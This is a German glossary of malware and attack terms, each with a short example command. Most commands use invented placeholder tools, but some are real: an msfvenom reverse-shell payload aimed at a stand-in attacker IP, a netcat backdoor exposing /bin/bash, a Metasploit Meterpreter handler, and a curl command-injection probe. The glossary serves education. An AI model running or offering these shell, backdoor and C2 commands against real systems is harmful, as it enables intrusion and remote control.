Malware, Viren etc.
1. Malware 🚨
Definition: Malware ist bösartige Software, entwickelt für schädliche Aktionen wie unautorisierten Zugang oder Datenzerstörung.
Typen: Virus, Wurm, Trojaner, Ransomware, Spyware.
Beispiel:
Ransomware: Ein Angreifer nutzt ein Phishing-Mail, um einen Benutzer dazu zu bringen, eine infizierte Datei herunterzuladen, die dann alle Dateien verschlüsselt.
$ ./ransomware_tool --encrypt /home/user/documents Dateien verschlüsselt, Kontaktieren Sie uns für den Entschlüsselungscode.
2. Payload 🎯
Definition: Der Teil der Malware, der die schädliche Wirkung entfaltet, z.B. Daten löschen oder eine Shell öffnen.
Beispiel:
Reverse Shell Payload: Nutze Metasploit, um eine Reverse Shell zu generieren.
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST={attacker_IP} LPORT=4444 -f elf > payload.elf Successfully created: payload.elf
Der Payload erlaubt es, eine Verbindung vom Zielsystem zurück zum Angreifer aufzubauen, um eine Shell zu bekommen.
3. Zero-Day 🕳️
Definition: Eine unbekannte Sicherheitslücke, die noch nicht gepatcht wurde.
Zero-Day Exploit: Ein Angriff, der eine Zero-Day-Schwachstelle ausnutzt.
Beispiel:
Exploitieren einer Zero-Day-Lücke:
$ exploit zero-day_target_module --target={vulnerable_version} Successfully exploited zero-day vulnerability.
Ein Angreifer nutzt eine ungepatchte Schwachstelle in einem Webserver aus, um Remote-Code auszuführen.
4. Exploit 💥
Definition: Ein Code oder eine Methode, um eine Schwachstelle auszunutzen.
Typen: Remote Code Execution (RCE), Privilege Escalation.
Beispiel:
Privilege Escalation Exploit:
$ sudo exploit_privilege --gain-root Privilegien erfolgreich erhöht: Sie sind jetzt Root!
Ein Angreifer nutzt eine lokale Schwachstelle, um seine Berechtigungen auf ein Administratorkonto zu erhöhen.
5. Rootkit 🛠️
Definition: Software, die darauf ausgelegt ist, Malware auf einem System zu verstecken und den dauerhaften Zugriff sicherzustellen.
Typen: User-Mode Rootkit, Kernel-Mode Rootkit.
Beispiel:
Kernel-Mode Rootkit:
$ insmod knark.o Knark Rootkit erfolgreich geladen. # Verstecke einen Prozess $ hide_proc 1234 Prozess 1234 versteckt.
Ein Kernel-Rootkit wird geladen, um die Anwesenheit eines bösartigen Prozesses zu verschleiern.
6. Backdoor 🔓
Definition: Ein versteckter Zugang zu einem System, um später erneut Zugriff zu erhalten.
Beispiele: Netcat Listening Service, versteckte SSH-Zugänge.
Beispiel:
Netcat Backdoor:
$ nc -lvp 4444 -e /bin/bash Listening on [any] 4444 ...
Netcat wird als Backdoor eingerichtet, um später wieder auf das System zugreifen zu können.
7. Trojaner 🐴
Definition: Malware, die sich als legitime Software tarnt, um Hintertüren zu öffnen.
Beispiel:
Falsches Installationsprogramm:
$ ./legit_software_installer Installing software... Trojaner installiert: Backdoor wurde geöffnet.
Der Benutzer führt eine vermeintlich legitime Installationsdatei aus, die zusätzlich einen Trojaner installiert, um einen Fernzugriff zu ermöglichen.
8. Virus 🦠
Definition: Schadsoftware, die sich in bestehende Programme einfügt und sich damit verbreitet.
Beispiel:
Selbstreplizierender Virus:
$ ./infect_file --target=/usr/bin/example_program Infizierte Datei /usr/bin/example_program: Virus-Code eingefügt.
Der Virus wird in eine existierende Datei eingebettet und verbreitet sich, wenn das Programm ausgeführt wird.
9. Wurm 🐛
Definition: Malware, die sich selbstständig im Netzwerk verbreitet.
Beispiel:
Netzwerk-Wurm:
$ ./worm --spread --target-network 192.168.0.0/24 Verbreitung gestartet: 5 neue Geräte infiziert.
Der Wurm verbreitet sich automatisch im Netzwerk, ohne Benutzereingriff.
10. Ransomware 🔒
Definition: Malware, die Daten verschlüsselt und ein Lösegeld fordert.
Beispiel:
Datenverschlüsselung:
$ ./ransomware --encrypt /home/user/files Dateien verschlüsselt. Zahlung erforderlich, um Entschlüsselungsschlüssel zu erhalten.
11. Spyware 👀
Definition: Software, die Daten über den Benutzer ohne dessen Wissen sammelt.
Beispiel:
Keylogger:
$ ./spyware --log-keystrokes Tastatureingaben werden protokolliert.
Die Spyware sammelt alle Tastenanschläge, um sensible Informationen zu stehlen.
12. Remote Code Execution (RCE) 🌐
Definition: Ein Exploit-Typ, der die Ausführung von Code auf einem entfernten System ermöglicht.
Beispiel:
RCE auf einem Webserver:
$ curl -X POST "http://target.com/vuln" -d "cmd=whoami" Response: root
Hier wird eine Schwachstelle genutzt, um Remote-Befehle auf einem Zielwebserver auszuführen.
13. Privilege Escalation ⬆️
Definition: Ausnutzung von Schwachstellen, um höhere Berechtigungen zu erlangen.
Beispiel:
Ausnutzen einer fehlerhaften Konfiguration:
$ sudo -u root /bin/bash Sie sind jetzt Root!
Der Benutzer nutzt eine fehlerhafte Konfiguration aus, die es ihm erlaubt, Root-Berechtigungen zu erhalten.
14. Keylogger ⌨️
Definition: Ein Tool, das alle Tastenanschläge des Benutzers aufzeichnet.
Beispiel:
Keylogger-Einsatz:
$ ./keylogger --output=/tmp/keystrokes.log Tastatureingaben werden in /tmp/keystrokes.log protokolliert.
Der Keylogger speichert die Tastenanschläge, um später Passwörter und sensible Daten zu stehlen.
15. Command & Control (C2) 🎛️
Definition: Infrastruktur, die Angreifer verwenden, um kompromittierte Geräte fernzusteuern.
Beispiel:
C2-Server mit Metasploit:
$ msfconsole msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > set LHOST {attacker_IP} msf > set LPORT 4444 msf > exploit Meterpreter session 1 opened
Hier wird ein C2-Server eingerichtet, um ein kompromittiertes System zu steuern.
16. Botnet 🤖
Definition: Ein Netzwerk von infizierten Computern, die von einem Angreifer zentral gesteuert werden.
Beispiel:
DDoS-Angriff mit Botnet:
$ ./botnet_controller --attack-ddos http://target.com --bots=1000 Starten eines DDoS-Angriffs auf http://target.com mit 1000 Bots.
Der Angreifer nutzt ein Botnet, um einen verteilten Denial-of-Service-Angriff (DDoS) auf eine Website durchzuführen.
Last updated